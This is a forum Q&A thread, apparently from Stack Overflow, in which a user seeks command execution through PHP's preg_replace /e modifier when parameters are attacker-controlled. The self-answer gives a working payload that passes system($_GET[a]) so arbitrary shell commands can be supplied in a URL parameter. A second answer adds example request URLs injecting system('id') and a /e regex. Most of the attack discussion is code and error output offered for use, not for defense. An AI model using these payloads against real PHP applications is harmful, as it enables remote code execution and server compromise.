Reputation: 2941
php preg_replace escapes single and double quotes
I am doing some security research and I have a problem with the evalutation of preg_replace() in PHP. My goal is that I can execute commands with this function. I have control over the first and third parameter of the preg_replace function but not the second. This code works just as intended, I only have trouble using a function like system() which needs a string as a parameter which I am not able to provide.
echo preg_replace('/(.+)/e', '\\1', "phpinfo()");
echo preg_replace('/(.+)/e', '\\1', 'phpinfo()');//we both work as intended
I have tried this simple example to find out how to use quotes and make use of strings in this context.
echo preg_replace('/(.+)/e', '\\1', '$a="1"');
echo preg_replace('/(.+)/e', '\\1', "$a='1'"); //basically the same, only switched ' and "
It is supposed to execute the command $a="1"; (I am well aware that it does nothing useful).
To be completely precise the third parameter is a GET parameter and I do not know if it is still relevant in this case what kind of quotation marks I use. To accomodate for both cases I tried both but without any success.
When I execute this line,
php > echo preg_replace('/(.+)/e', '\\1', '$a="1"');
I get an error like,
PHP Parse error: syntax error, unexpected '"', expecting identifier (T_STRING) in php shell
code(1) : regexp code on line 1
PHP Fatal error: preg_replace(): Failed evaluating code:
$a=\"1\" in php shell code on line 1
//Same command, switches quotation marks
php > echo preg_replace('/(.+)/e', '\\1', "$a='1'");
PHP Notice: Undefined variable: a in php shell code on line 1
PHP Parse error: syntax error, unexpected '=' in php shell code(1) : regexp code on line 1
PHP Fatal error: preg_replace(): Failed evaluating code:
=\'1\' in php shell code on line 1
I have read the error messages and did some research on this topic but was unable to find something that helped me.
Using preg_quote around the third parameter does not solve this problem.
What I want is being able to execute functions that take strings as an input in the evaluation of preg_replace(). Any help is highly appreciated.
Upvotes: 1
Views: 2001
Answers (2)
Reputation: 2941
I figuered out how to solve my problem. I came to the conclusion that what I wanted to do does not seem to be possible, at least not in this way.
However, when I use the following code
echo preg_replace("/(.+)/e", "\\1", "system($_GET[a])");
I can simply add another GET parameter in the URL which contains all my commands. With this method I do not need to care about preg_replace escaping my ' and ".
Note, that the Use of $_GET[a] is not correct, but because PHP is so nice it just assumes, that the unknow constant a is supposed to be a string and interpretes it this way. In the GET parameter a I can now insert any command I desire to execute.
Upvotes: 0
Reputation: 217
I would like to comment but can't yet...
I assume the code looks like this:
preg_replace('/(.+)/e', '\\1', $_GET['code']);
since you are saying that the third parameter comes with GET. Can't you just do something like
http://somesuperduperurl.xxx/code=system('id')
? You say that you are able to control the first parameter of preg_replace. Is it also through a GET?
http://somesuperduperurl.xxx/sth=/known/e?code=system('id')
Have you tried this?
Upvotes: 1
Related Questions
- Make first letter of whitelisted words uppercase
- Unable to properly escape unescaped special characters using preg_replace in PHP
- PHP preg_replace between string and quotes
- PHP preg_replace Strips Quotes
- preg_replace function not functioning on PHP variables containing doublequotes(")
- Escaping this string? (PHP)
- Regex to escape double quotes inside double quotes with preg_replace
- Error escaping quotes in regular expressions in PHP
- How to replace double quotes?
- Escaping "." in preg_replace